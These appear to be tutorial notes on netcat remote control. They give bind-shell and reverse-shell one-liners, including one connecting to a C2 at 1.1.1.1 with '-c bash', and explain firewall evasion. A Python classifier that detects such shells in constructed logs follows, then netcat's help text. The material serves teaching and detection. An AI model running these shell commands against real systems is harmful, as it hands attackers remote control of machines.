=== Using nc for remote control ===
The principle is the same as the text transfer earlier: the server side listens, the client side connects, and then the listening server side passes its own shell over to the client.
Forward (bind): the listener is the compromised host, and the C2 connects to it.
SERVER: nc -lp 333 -c bash
CLIENT: nc -nv 1.1.1.1 333
Or reverse: the listener is the C2, and the compromised host connects out to the C2.
SERVER: nc -lp 333
CLIENT: nc -nv 1.1.1.1 333 -c bash
-c shell command: the shell to run. On Windows use cmd.
Note: whichever side uses -c bash is the compromised host; it is the compromised host that hands out the shell. The reverse form can be used to get through a firewall, because the connection is initiated by the compromised host, from inside the internal network, outward to the attacker's C2 machine.
The same idea applies to traversing firewalls with other protocols, for example FTP passive and active mode.
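The bind/reverse distinction above is exactly what a host-side detection needs to key on. As an added example that is not part of the original notes, here is a small Python classifier run over constructed process-creation log lines (the log format, host name, user names and IP addresses are all made up for the example): it flags a netcat invocation that combines -c/-e with -l as a bind shell and one that combines -c/-e with a remote host as a reverse shell, which is the same rule as "whichever side uses -c bash is the compromised host".

```python
import re
import shlex

# Constructed sample process-creation log lines in a hypothetical
# "<timestamp> host=<name> user=<user> cmd=<command line>" format.
# They are made up for this example and do not come from a real system.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z host=web01 user=www-data cmd=nc -lp 333 -c bash
2024-01-01T10:00:02Z host=web01 user=www-data cmd=nc -nv 10.0.0.5 333 -c bash
2024-01-01T10:00:03Z host=web01 user=admin cmd=nc -nv 10.0.0.5 333
2024-01-01T10:00:04Z host=web01 user=admin cmd=nc -zv 10.0.0.5 22
2024-01-01T10:00:05Z host=web01 user=admin cmd=ncat -l 4444 -e /bin/sh
2024-01-01T10:00:06Z host=web01 user=root cmd=/usr/bin/nc.traditional -l -p 333 -e /bin/bash
"""

# Binary names treated as netcat variants (matched on the basename of argv[0]).
NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$"
)


def classify_netcat(cmdline):
    """Classify one command line.

    Returns 'bind_shell' (listens and execs a program), 'reverse_shell'
    (connects out and execs a program), 'netcat' (netcat without -c/-e),
    or None when the command is not netcat at all.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None  # unbalanced quotes; nothing we can classify
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None

    listens = False
    execs = False
    for arg in argv[1:]:
        # Traditional nc bundles short flags (-lp, -nv), so inspect every
        # letter of a short-option cluster. Long options (--exec) are ignored.
        if arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            letters = set(arg[1:])
            if "l" in letters:
                listens = True
            if "c" in letters or "e" in letters:  # -c / -e: program handed to the peer
                execs = True

    if execs and listens:
        return "bind_shell"
    if execs:
        return "reverse_shell"
    return "netcat"


def scan_log(text):
    """Return an alert record for every log line that looks like a netcat shell."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        verdict = classify_netcat(m.group("cmd"))
        if verdict in ("bind_shell", "reverse_shell"):
            alerts.append({"ts": m.group("ts"), "host": m.group("host"),
                           "user": m.group("user"), "cmd": m.group("cmd"),
                           "verdict": verdict})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["ts"]} {a["host"]} {a["user"]}: {a["verdict"]} <- {a["cmd"]}')
```

The classifier keys on the binary name and on the short flags that nc's own help marks [dangerous!!], so it is a first-pass host signal rather than a complete control. Two caveats a practitioner should know: the OpenBSD netcat build ships without -e and uses -c to mean TLS, so on such systems a plain "nc -c" is a false positive for this rule; and a reverse shell only ever appears in the process log of the compromised host, so the outbound connection it opens (a service account such as www-data connecting to an unfamiliar address) is the complementary network-side signal.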
root@kali:~/Documents# nc -h
[v1.10-41]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]